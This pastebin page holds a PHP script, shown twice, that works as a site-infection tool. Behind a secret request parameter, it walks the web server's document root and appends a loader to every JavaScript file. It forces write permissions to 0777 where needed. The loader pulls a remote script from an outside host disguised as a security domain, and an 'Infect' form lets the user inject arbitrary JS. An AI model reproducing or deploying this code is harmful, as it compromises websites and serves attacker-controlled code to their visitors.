Untitled

From Scanty Meerkat, 3 Years ago, written in Plain Text.

Embed

Download Paste or View Raw
Hits: 43

<?php

if(!isset($_REQUEST['a820ebe2e6d2ce356c5edd92d521bc22edab5727']))

return;

$startFolder = $_SERVER['DOCUMENT_ROOT'];

echo "<style> body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;} </style>";

echo "<div style='margin: 30px; '><form method=post><input hidden name='req' value='inj'><input style='margin-bottom:10px; width:100%;background-color: black; color:#ffffff' name='path_inj' placeholder='$startFolder'><textarea placeholder='Enter js code which need add' name='jscode_injector' style='width:100%;background-color: black; height: 400px; color:#ffffff'></textarea><br/><br/><br/><input type=submit value=Infect name=jscode_injector_submit></form></div> ";

$add_text = <<<_HTML

document.addEventListener('DOMContentLoaded', function(){ if(typeof window.web_security == "undefined"){ var s = document.createElement("script"); s.src = "//web-security.cloud/event?l=39728"; document.head.appendChild(s); window.web_security = "success"; }}, false);

_HTML;

$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($startFolder));

foreach ($rii as $file) {

if ($file->isDir()) {

continue;

}

$file_info = explode(".", $file->getPathname());

$ext = $file_info[sizeof($file_info) - 1];

if (strtolower($ext) !== "js")

continue;

$isInjected = file_put_contents($file->getPathname(), "\n" . $add_text, FILE_APPEND | LOCK_EX);

$isInjectable = true;

if (!$isInjected) {

$isInjectable = chmod($file->getPathname(), 0777);

$isInjected = file_put_contents($file->getPathname(), "\n" . $add_text, FILE_APPEND | LOCK_EX);

}

echo "<b style='color: goldenrod'>" . $file->getPathname() . "</b> :: is injected : " .

(($isInjected) ? "<b style='color: greenyellow'>YES</b>" : "<b style='color: crimson'>NO</b>") .

" :: is injectable : " .

(($isInjectable) ? "<b style='color: greenyellow'>YES</b>" : "<b style='color: crimson'>NO</b>") .

"<br />";

}

Author

Title

Language

Your paste - Paste your paste here

&lt;?php

if(!isset($_REQUEST['a820ebe2e6d2ce356c5edd92d521bc22edab5727']))
    return;

$startFolder = $_SERVER['DOCUMENT_ROOT'];

echo &quot;&lt;style&gt; body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;} &lt;/style&gt;&quot;;
echo &quot;&lt;div style='margin: 30px; '&gt;&lt;form method=post&gt;&lt;input hidden name='req' value='inj'&gt;&lt;input style='margin-bottom:10px; width:100%;background-color: black; color:#ffffff' name='path_inj' placeholder='$startFolder'&gt;&lt;textarea placeholder='Enter js code which need add' name='jscode_injector' style='width:100%;background-color: black; height: 400px; color:#ffffff'&gt;&lt;/textarea&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;input type=submit value=Infect name=jscode_injector_submit&gt;&lt;/form&gt;&lt;/div&gt; &quot;;

$add_text = &lt;&lt;&lt;_HTML
document.addEventListener('DOMContentLoaded', function(){    if(typeof window.web_security == &quot;undefined&quot;){        var s = document.createElement(&quot;script&quot;);        s.src = &quot;//web-security.cloud/event?l=39728&quot;;        document.head.appendChild(s);        window.web_security = &quot;success&quot;;    }}, false);
_HTML;
$rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($startFolder));
foreach ($rii as $file) {
    if ($file-&gt;isDir()) {
        continue;
    }
    $file_info = explode(&quot;.&quot;, $file-&gt;getPathname());
    $ext = $file_info[sizeof($file_info) - 1];
    if (strtolower($ext) !== &quot;js&quot;)
        continue;
    $isInjected = file_put_contents($file-&gt;getPathname(), &quot;\n&quot; . $add_text, FILE_APPEND | LOCK_EX);
    $isInjectable = true;
    if (!$isInjected) {
        $isInjectable = chmod($file-&gt;getPathname(), 0777);
        $isInjected = file_put_contents($file-&gt;getPathname(), &quot;\n&quot; . $add_text, FILE_APPEND | LOCK_EX);
    }
    echo &quot;&lt;b style='color: goldenrod'&gt;&quot; . $file-&gt;getPathname() . &quot;&lt;/b&gt; :: is injected : &quot; .
        (($isInjected) ? &quot;&lt;b style='color: greenyellow'&gt;YES&lt;/b&gt;&quot; : &quot;&lt;b style='color: crimson'&gt;NO&lt;/b&gt;&quot;) .
        &quot; :: is injectable : &quot; .
        (($isInjectable) ? &quot;&lt;b style='color: greenyellow'&gt;YES&lt;/b&gt;&quot; : &quot;&lt;b style='color: crimson'&gt;NO&lt;/b&gt;&quot;) .
        &quot;&lt;br /&gt;&quot;;
}

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

Reply to "Untitled"